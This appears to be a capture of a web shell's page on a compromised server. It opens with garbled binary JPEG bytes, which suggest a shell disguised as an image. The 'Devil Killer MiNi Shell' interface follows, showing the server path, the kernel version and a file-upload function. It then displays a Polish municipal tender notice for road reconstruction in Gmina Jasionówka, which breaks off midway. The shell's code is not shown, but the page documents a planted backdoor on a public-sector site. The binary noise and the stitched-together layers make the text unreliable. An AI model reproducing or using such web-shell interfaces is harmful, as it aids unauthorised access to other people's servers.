JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220301/0007144101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa oraz przebudowa dróg na terenie Gminy Jasionówka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JASIONÓWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659332</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasionówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857278030</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">857278031</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@jasionowka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.ug.jasionowka.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa oraz przebudowa dróg na terenie Gminy Jasionówka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3d348153-994f-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00071441</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033800/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa róg( drogi gminne: Krasne Folwarczne- Łękobudy, Kamionka - Krzywa, Kamionka- Romejki, ul. Knyszyńska w Jasionówce, drogi powiatowe: Łękobudy- wieś, Kujbiedy - wieś)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.ug.jasionowka.wrotapodlasia.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym w Wykonawcą, odbywać się będzie przy użyciu środków komunikacji elektronicznej. <br/>2. Komunikacja między Zamawiającym a Wykonawcami odbywać się będzie za pośrednictwem portalu – https://miniportal.uzp.gov.pl/, a po otwarciu ofert Zamawiający dodatkowo dopuszcza komunikację za pomocą poczty elektronicznej e-mail.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. W celu wzięcia udziału w postępowaniu, Wykonawca musi posiadać konto na Platformie. Rejestracja i utrzymywanie konta na Platformie, a także korzystnie z Platformy jest bezpłatne.<br/>4. Wymagania techniczne i organizacyjne korzystania z Platformy, instrukcja korzystania z Platformy znajdują się na stronie https://miniportal.uzp.gov.pl/.5. Zamawiający dopuszcza przesyłanie plików w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docs, .rtf lub .odt, pades, xades. <br/>Zamawiający zaleca przesyłanie plików w formacie .pdf .<br/>6. Zalecenia Zamawiającego dotyczące kwalifikowanego podpisu elektronicznego:<br/>1) dla dokumentów w formacie .pdf zaleca się zastosowanie podpisu w formacie PadES lub XadEs,<br/>2) dla dokumentów w formacie innym niż .pdf zaleca się zastosowanie podpisu wewnętrznego w formacie XAdES. Wykonawca zobowiązany jest załączyć plik z dokumentem oraz plik z podpisem, czyli dwa pliki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z Klauzula informacyjna - udzielenie zamówienia publicznego stanowiąca załącznik do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa z rozbudową drogi gminnej Nr 104004B od drogi krajowej nr 8- Krasne Folwarczne - do drogi powiatowej Nr 1401B w km 0+000-2+687 oraz przebudowa z rozbudową drogi powiatowej Nr 1401B Łękobudy – Milewskie – Andrzejów – dr. Woj. Nr 671 w km 0+000 – 0+345. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:<br/>1) cena ofertowa - 60%<br/>2) okres gwarancji – 40%<br/>	gdzie 1% = 1 pkt<br/><br/>Ad 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:<br/>C = (Cmin ÷ Co) x 60 pkt<br/>gdzie:<br/>C – liczba punktów w kryterium ceny ofertowej<br/>Cmin – najniższa cena spośród ofert nieodrzuconych<br/>Co – cena oferty badanej<br/>Oferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.<br/>	<br/>Ad 2) ocena ofert w kryterium „okres gwarancji” (G) nastąpi wg następującego sposobu:<br/> do 60 m-cy – 0 pkt, za kolejne miesiące gwarancji powyżej 60-ciu (maksymalnie do 84) – punkty przyznane będą proporcjonalnie do liczby tych miesięcy (maksymalnie 40 pkt), wg wzoru:<br/> G = (Go - 60) ÷ 0,6 pkt<br/> gdzie:<br/> G – liczba punktów w kryterium okres gwarancji<br/> Go – okres gwarancji zawarty w ofercie<br/> np. gwarancja od 36 do 60 m-cy = 0 pkt<br/> 66 m-cy: (66-60) ÷ 0,6 pkt = 10 pkt<br/> 72 m-ce: (72-60) ÷ 0,6 pkt= 20 pkt,<br/> 78 m-cy: (78-60) ÷ 0,6 pkt = 30 pkt<br/> 84 m-ce: (84-60) ÷ 0,6 pkt = 40 pkt.<br/> <br/>	Przy czym minimalny okres gwarancji wynosi 36 m-cy, maksymalny 84 m-ce. Wykonawca powinien zaoferować jeden z w/w okresów gwarancji. Podanie innego okresu gwarancji spowoduje przyjęcie przez zamawiającego najbliższego z w/w okresów z zaokrągleniem w dół. Podanie przez Wykonawcę krótszego niż 36 m-cy okresu gwarancji spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp., jako niezgodnej z warunkami zamówienia. Jeżeli Wykonawca nie wypełni w ofercie pola dotyczącego okresu gwarancji, będzie to potraktowane jako zaoferowanie minimalnego wymaganego okresu gwarancji (36 miesięcy). Podanie przez Wykonawcę dłuższego okresu niż 84 m-ce skutkować będzie przyjęciem przez Zamawiającego maksymalnego okresu gwarancji. Okres rękojmi zgodnie z obowiązującymi przepisami – art. 568 Kodeksu cywilnego – wynosi 5 lat.<br/>Oferta może uzyskać w zakresie kryterium okresu gwarancji (G) maksymalnie 40 punktów.<br/><br/> 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:<br/><br/>W = C + G <br/><br/>gdzie: <br/>W - wartość punktowa oferty,<br/>C - ilość punktów za kryterium: cena ofertowa,<br/>G- ilość punktów za kryterium: okres gwarancji,<br/>Łącznie oferta może uzyskać maksymalnie 100 pkt.<br/><br/> 3. Ilość punktów w poszczególnych kryteriach zostanie zaokrąglona do dwóch miejsc po przecinku (jeśli to konieczne).<br/> 4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/> 5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/> 6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa z rozbudową drogi gminnej w miejscowości Kujbiedy w km 0+811,9 – 1+019 oraz przebudowa z rozbudową drogi powiatowej Nr 1402 B Kujbiedy (od dr. 1401B) w km 0+000- 0+811,9. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:<br/>1) cena ofertowa - 60%<br/>2) okres gwarancji – 40%<br/>	gdzie 1% = 1 pkt<br/><br/>Ad 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:<br/>C = (Cmin ÷ Co) x 60 pkt<br/>gdzie:<br/>C – liczba punktów w kryterium ceny ofertowej<br/>Cmin – najniższa cena spośród ofert nieodrzuconych<br/>Co – cena oferty badanej<br/>Oferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.<br/>	<br/>Ad 2) ocena ofert w kryterium „okres gwarancji” (G) nastąpi wg następującego sposobu:<br/> do 60 m-cy – 0 pkt, za kolejne miesiące gwarancji powyżej 60-ciu (maksymalnie do 84) – punkty przyznane będą proporcjonalnie do liczby tych miesięcy (maksymalnie 40 pkt), wg wzoru:<br/> G = (Go - 60) ÷ 0,6 pkt<br/> gdzie:<br/> G – liczba punktów w kryterium okres gwarancji<br/> Go – okres gwarancji zawarty w ofercie<br/> np. gwarancja od 36 do 60 m-cy = 0 pkt<br/> 66 m-cy: (66-60) ÷ 0,6 pkt = 10 pkt<br/> 72 m-ce: (72-60) ÷ 0,6 pkt= 20 pkt,<br/> 78 m-cy: (78-60) ÷ 0,6 pkt = 30 pkt<br/> 84 m-ce: (84-60) ÷ 0,6 pkt = 40 pkt.<br/> <br/>	Przy czym minimalny okres gwarancji wynosi 36 m-cy, maksymalny 84 m-ce. Wykonawca powinien zaoferować jeden z w/w okresów gwarancji. Podanie innego okresu gwarancji spowoduje przyjęcie przez zamawiającego najbliższego z w/w okresów z zaokrągleniem w dół. Podanie przez Wykonawcę krótszego niż 36 m-cy okresu gwarancji spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp., jako niezgodnej z warunkami zamówienia. Jeżeli Wykonawca nie wypełni w ofercie pola dotyczącego okresu gwarancji, będzie to potraktowane jako zaoferowanie minimalnego wymaganego okresu gwarancji (36 miesięcy). Podanie przez Wykonawcę dłuższego okresu niż 84 m-ce skutkować będzie przyjęciem przez Zamawiającego maksymalnego okresu gwarancji. Okres rękojmi zgodnie z obowiązującymi przepisami – art. 568 Kodeksu cywilnego – wynosi 5 lat.<br/>Oferta może uzyskać w zakresie kryterium okresu gwarancji (G) maksymalnie 40 punktów.<br/><br/> 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:<br/><br/>W = C + G <br/><br/>gdzie: <br/>W - wartość punktowa oferty,<br/>C - ilość punktów za kryterium: cena ofertowa,<br/>G- ilość punktów za kryterium: okres gwarancji,<br/>Łącznie oferta może uzyskać maksymalnie 100 pkt.<br/><br/> 3. Ilość punktów w poszczególnych kryteriach zostanie zaokrąglona do dwóch miejsc po przecinku (jeśli to konieczne).<br/> 4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/> 5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/> 6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa z rozbudową drogi gminnej Nr 104002B od drogi powiatowej Nr 1357B (Bobrówka-Kamionka)-Krzywa - do drogi powiatowej Nr 1357B (Kamionka – DW 671) w km 0+000- 2+227,6 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:<br/>1) cena ofertowa - 60%<br/>2) okres gwarancji – 40%<br/>	gdzie 1% = 1 pkt<br/><br/>Ad 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:<br/>C = (Cmin ÷ Co) x 60 pkt<br/>gdzie:<br/>C – liczba punktów w kryterium ceny ofertowej<br/>Cmin – najniższa cena spośród ofert nieodrzuconych<br/>Co – cena oferty badanej<br/>Oferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.<br/>	<br/>Ad 2) ocena ofert w kryterium „okres gwarancji” (G) nastąpi wg następującego sposobu:<br/> do 60 m-cy – 0 pkt, za kolejne miesiące gwarancji powyżej 60-ciu (maksymalnie do 84) – punkty przyznane będą proporcjonalnie do liczby tych miesięcy (maksymalnie 40 pkt), wg wzoru:<br/> G = (Go - 60) ÷ 0,6 pkt<br/> gdzie:<br/> G – liczba punktów w kryterium okres gwarancji<br/> Go – okres gwarancji zawarty w ofercie<br/> np. gwarancja od 36 do 60 m-cy = 0 pkt<br/> 66 m-cy: (66-60) ÷ 0,6 pkt = 10 pkt<br/> 72 m-ce: (72-60) ÷ 0,6 pkt= 20 pkt,<br/> 78 m-cy: (78-60) ÷ 0,6 pkt = 30 pkt<br/> 84 m-ce: (84-60) ÷ 0,6 pkt = 40 pkt.<br/> <br/>	Przy czym minimalny okres gwarancji wynosi 36 m-cy, maksymalny 84 m-ce. Wykonawca powinien 